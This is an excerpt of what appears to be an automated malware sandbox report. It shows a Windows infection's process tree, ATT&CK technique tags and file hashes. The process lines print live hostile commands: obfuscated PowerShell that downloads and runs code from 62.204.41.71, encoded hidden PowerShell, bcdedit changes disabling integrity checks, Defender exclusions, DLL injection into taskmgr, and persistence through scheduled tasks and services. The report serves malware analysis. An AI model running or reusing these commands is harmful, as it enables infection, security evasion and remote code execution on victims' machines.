PID:1420

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
6⤵
- Modifies boot configuration data using bcdedit
PID:2016

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:1620

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
6⤵
- Modifies boot configuration data using bcdedit
PID:404

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
6⤵
- Modifies boot configuration data using bcdedit
PID:464

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:1872

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
6⤵
- Modifies boot configuration data using bcdedit
PID:1640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1756

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
6⤵
- Modifies boot configuration data using bcdedit
PID:1872

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
6⤵
- Modifies boot configuration data using bcdedit
PID:1640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
6⤵
- Modifies boot configuration data using bcdedit
PID:1860

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
6⤵
- Modifies boot configuration data using bcdedit
PID:404

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
6⤵
- Modifies boot configuration data using bcdedit
PID:1640

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
6⤵
- Modifies boot configuration data using bcdedit
PID:1860

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
5⤵
- Modifies boot configuration data using bcdedit
PID:464

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
5⤵
- Executes dropped EXE
PID:1528

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2532

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:816

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
PID:1544

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1088

C:\Users\Admin\Pictures\Adobe Films\kEr7GFa8cE1DrzemeCx_fozi.exe
"C:\Users\Admin\Pictures\Adobe Films\kEr7GFa8cE1DrzemeCx_fozi.exe"
3⤵
- Executes dropped EXE
PID:1652

C:\Users\Admin\Pictures\Adobe Films\7GIEcJAjHVnlLymwwBfwoMmL.exe
"C:\Users\Admin\Pictures\Adobe Films\7GIEcJAjHVnlLymwwBfwoMmL.exe"
3⤵
- Executes dropped EXE
PID:804

C:\Users\Admin\Pictures\Adobe Films\8TxLhHUQ1oZ0Uu5hlebvJ2zF.exe
"C:\Users\Admin\Pictures\Adobe Films\8TxLhHUQ1oZ0Uu5hlebvJ2zF.exe"
3⤵
- Executes dropped EXE
PID:1528

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2580

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2780

C:\Users\Admin\Documents\GHKNnbu5FXjz3_fYGQTTXi9M.exe
"C:\Users\Admin\Documents\GHKNnbu5FXjz3_fYGQTTXi9M.exe"
4⤵
PID:2760

C:\Users\Admin\Pictures\Adobe Films\tVjWgRWFuENkMzHM989O3gyj.exe
"C:\Users\Admin\Pictures\Adobe Films\tVjWgRWFuENkMzHM989O3gyj.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1152

C:\Users\Admin\Pictures\Adobe Films\Oau9f5hESt2piyFB0srDrfeN.exe
"C:\Users\Admin\Pictures\Adobe Films\Oau9f5hESt2piyFB0srDrfeN.exe"
3⤵
- Executes dropped EXE
PID:2072

C:\Users\Admin\Pictures\Adobe Films\H4xHPtfnp34v0pHb0rXM2ukW.exe
"C:\Users\Admin\Pictures\Adobe Films\H4xHPtfnp34v0pHb0rXM2ukW.exe"
3⤵
- Executes dropped EXE
PID:2092

C:\Users\Admin\Pictures\Adobe Films\jYstIpRhHMPbJk_cInWr7lmb.exe
"C:\Users\Admin\Pictures\Adobe Films\jYstIpRhHMPbJk_cInWr7lmb.exe"
3⤵
- Executes dropped EXE
PID:2160

C:\Users\Admin\Pictures\Adobe Films\wMU7e8jcER5PpPMVk_s6HIVn.exe
"C:\Users\Admin\Pictures\Adobe Films\wMU7e8jcER5PpPMVk_s6HIVn.exe"
3⤵
- Executes dropped EXE
PID:2152

C:\Users\Admin\Pictures\Adobe Films\TD1d_0Y92mcuUwAjrMxXkjHW.exe
"C:\Users\Admin\Pictures\Adobe Films\TD1d_0Y92mcuUwAjrMxXkjHW.exe"
3⤵
- Executes dropped EXE
PID:2176

C:\Users\Admin\Pictures\Adobe Films\4hLOdwiWnZa_mNs2RwFGYhXv.exe
"C:\Users\Admin\Pictures\Adobe Films\4hLOdwiWnZa_mNs2RwFGYhXv.exe"
3⤵
- Executes dropped EXE
PID:2168

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\knwgeyt\
4⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nvqombwl.exe" C:\Windows\SysWOW64\knwgeyt\
4⤵
PID:2188

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create knwgeyt binPath= "C:\Windows\SysWOW64\knwgeyt\nvqombwl.exe /d\"C:\Users\Admin\Pictures\Adobe Films\4hLOdwiWnZa_mNs2RwFGYhXv.exe\"" type= own start= auto DisplayName= "wifi support"
4⤵
PID:2204

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description knwgeyt "wifi internet conection"
4⤵
PID:1620

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start knwgeyt
4⤵
PID:2408

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
4⤵
PID:2832

C:\Users\Admin\Pictures\Adobe Films\GXHLCfUnGIYVJbhSUgFpdckC.exe
"C:\Users\Admin\Pictures\Adobe Films\GXHLCfUnGIYVJbhSUgFpdckC.exe"
3⤵
- Executes dropped EXE
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:2488

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:2560

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:2648

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:2640

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:3068

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:3060

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
- Executes dropped EXE
PID:2100

C:\Windows\SysWOW64\waitfor.exe
waitfor /t 5 jFjyKdbHiNcpqGHLaDXhhIXfDT
6⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
7⤵
PID:3060

C:\Users\Admin\Pictures\Adobe Films\3qRp7a13ycwuUiJD40qblMly.exe
"C:\Users\Admin\Pictures\Adobe Films\3qRp7a13ycwuUiJD40qblMly.exe"
3⤵
- Executes dropped EXE
PID:2120

C:\Users\Admin\Pictures\Adobe Films\N95dd5TPDI19sIMZ7IKIHq1l.exe
"C:\Users\Admin\Pictures\Adobe Films\N95dd5TPDI19sIMZ7IKIHq1l.exe"
3⤵
- Executes dropped EXE
PID:2108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:2748

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
4⤵
PID:1012

C:\Users\Admin\Pictures\Adobe Films\wtkLvoCpgpZk0IYKMqujfJQP.exe
"C:\Users\Admin\Pictures\Adobe Films\wtkLvoCpgpZk0IYKMqujfJQP.exe"
3⤵
PID:2100

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "wtkLvoCpgpZk0IYKMqujfJQP.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\wtkLvoCpgpZk0IYKMqujfJQP.exe" & exit
4⤵
PID:2760

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "wtkLvoCpgpZk0IYKMqujfJQP.exe" /f
5⤵
- Kills process with taskkill
PID:2824

C:\Users\Admin\Pictures\Adobe Films\49WLUN7reDqByNTOmOCHCazs.exe
"C:\Users\Admin\Pictures\Adobe Films\49WLUN7reDqByNTOmOCHCazs.exe"
3⤵
- Executes dropped EXE
PID:2084

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 49WLUN7reDqByNTOmOCHCazs.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\49WLUN7reDqByNTOmOCHCazs.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:2552

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 49WLUN7reDqByNTOmOCHCazs.exe /f
5⤵
- Kills process with taskkill
PID:2344

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:2116

C:\Users\Admin\Pictures\Adobe Films\sfjQSxqjrAEHWVfM9VOBo9v7.exe
"C:\Users\Admin\Pictures\Adobe Films\sfjQSxqjrAEHWVfM9VOBo9v7.exe"
3⤵
PID:2220

C:\Users\Admin\AppData\Local\Temp\7zS56B8.tmp\Install.exe
.\Install.exe
4⤵
PID:2964

C:\Users\Admin\AppData\Local\Temp\7zS78C8.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:2164

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:1980

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:2408

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:2184

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:752

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:1968

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:972

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:2444

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdpkjmlsY" /SC once /ST 04:50:29 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:2100

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdpkjmlsY"
6⤵
PID:2944

C:\Users\Admin\Pictures\Adobe Films\j9WnWhEPseZ219WrP4tvCfpE.exe
"C:\Users\Admin\Pictures\Adobe Films\j9WnWhEPseZ219WrP4tvCfpE.exe"
3⤵
- Executes dropped EXE
PID:2240

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
4⤵
PID:3000

C:\Windows\system32\mode.com
mode 65,10
5⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
5⤵
PID:2336

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_9.zip -oextracted
5⤵
PID:2548

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_8.zip -oextracted
5⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_7.zip -oextracted
5⤵
PID:2360

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_6.zip -oextracted
5⤵
PID:2572

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
PID:2640

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
PID:2340

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
PID:2768

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
PID:2368

C:\Windows\system32\attrib.exe
attrib +H "Result_protected.exe"
5⤵
- Views/modifies file attributes
PID:2296

C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
"Result_protected.exe"
5⤵
PID:2260

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
6⤵
PID:2584

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
7⤵
- Creates scheduled task(s)
PID:972

C:\Users\Admin\AppData\Local\Temp\222.exe
"C:\Users\Admin\AppData\Local\Temp\222.exe"
6⤵
PID:2688

C:\Users\Admin\Pictures\Adobe Films\6ZqNlvEIRw68TjmwO8HInpvx.exe
"C:\Users\Admin\Pictures\Adobe Films\6ZqNlvEIRw68TjmwO8HInpvx.exe"
3⤵
PID:2792

C:\Users\Admin\AppData\Local\Temp\072939a2-cc49-4840-b36a-d01541d69e76.exe
"C:\Users\Admin\AppData\Local\Temp\072939a2-cc49-4840-b36a-d01541d69e76.exe"
4⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:992

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220312050504.log C:\Windows\Logs\CBS\CbsPersist_20220312050504.cab
1⤵
- Drops file in Windows directory
PID:1872

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1878507227-39218121-1811955100-1693549035-51293091-6865847571696995025464053411"
1⤵
PID:1872

C:\Windows\SysWOW64\knwgeyt\nvqombwl.exe
C:\Windows\SysWOW64\knwgeyt\nvqombwl.exe /d"C:\Users\Admin\Pictures\Adobe Films\4hLOdwiWnZa_mNs2RwFGYhXv.exe"
1⤵
PID:2380

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:2944

C:\Windows\system32\taskeng.exe
taskeng.exe {FD7F6186-149E-49EB-8DB5-8FCB240C609C} S-1-5-21-2199625441-3471261906-229485034-1000:DRLQIXCW\Admin:Interactive:[1]
1⤵
PID:2548

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
2⤵
PID:2988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
PID:2172

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Impair Defenses

T1562

Install Root Certificate

T1130

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
428a997b6ab2958f156a56d25a6f1f08

SHA1
dce4d796bdb32c569be19382a8b2902640817109

SHA256
6f15eafd19769a5b6bbc547df595ee3b8a5704f93e62a17671fc1014cf6e51ec

SHA512
1477d5a4a4f3dda1a2b9982e0193dab39ce924a8eeee123209124aa3da57c3f7d617e831ede160408e849a7de21a6cf679632921acd6a647648d6c1fc548492b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
5acaa3069254b52dac5ddc8202fdce05

SHA1
a40f1020b4670be55af3327230803e379f9403d2

SHA256
f5e682195db1d77785bcc56b600b27a519c49d62907db05594adf09c0da7bb33

SHA512
e6f1b437c10d3237f7bd6307089785af0cc10ec1d27d9e2358ec5e6618b75eed0e4ab04702302063ef26b84672f0d98d246ee98a701ac881d3634940aa23c4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe
MD5
c9f445ba47d43aba67caf6020c2390d3

SHA1
03180d69fa4b26edbe627e2691df38882eab03b0

SHA256
acc70eb94782931ab5f817a91b3c4cedf4c3077fb497a63e90a55e500da7676e

SHA512
8c1e34f04f84fa00b58499c8ee986ebef15ba015021831ee4582f8d0c2347192c9b1d6f15211bc7c9490e268066801f35565b8d85ab07796a06937b5cf4ac141

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
fb0a411f9683bf0bb1884afd509a7300

SHA1
7d2496d1908c030909d8945a19e145ccb0c36c00

SHA256
5bc6a35a61345c73b04ac2c3bd511166997b0c94d24e1076f4dd76c27a64a740

SHA512
68e7492a4155e80a456cbb5709033c8d5689c70f9f4c8b342c7d08d99dfb34c46242f9a638c1bed149b76e96b86ffb40a081e9b59fcbbfe153d08ad36ad5cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
fb0a411f9683bf0bb1884afd509a7300

SHA1
7d2496d1908c030909d8945a19e145ccb0c36c00

SHA256
5bc6a35a61345c73b04ac2c3bd511166997b0c94d24e1076f4dd76c27a64a740

SHA512
68e7492a4155e80a456cbb5709033c8d5689c70f9f4c8b342c7d08d99dfb34c46242f9a638c1bed149b76e96b86ffb40a081e9b59fcbbfe153d08ad36ad5cf09

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Graphics.exe
MD5
9a940978a9ab12fa6be0a7da62b110c8

SHA1
dd24a294ebc8505712d91e7b2b2e2a8aa854ff44

SHA256
0ee995eb4f363d5e934e4a3fee32d44ad8775bcd47e32ce413f4265dc35f3c9d

SHA512
d103fbdf36bc2eb18b569026026b542e7227e41302db59395da83daa2af96d132b0242a0e7dcd89ec85fb4a96ba014a4494ba78eee9a205c7153b536c292a825

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
70aae7cb1d740226a0092f03d91198ac

SHA1
d7403661766b9c71b7077e46521e520fba8079ec

SHA256
2ddab1335ab3520e0ed44f1d2b5902da77b659ed22d2ecbc3bf858f77084e8d3

SHA512
062cf2526603787463f3fe5e8aadaad2543fc3800c22a9cf404e91745015ca7d4b4546258b0e1f2cbfcd148d169ee772b1defdc24191f90955fadb2e1b444dad

Download Submit
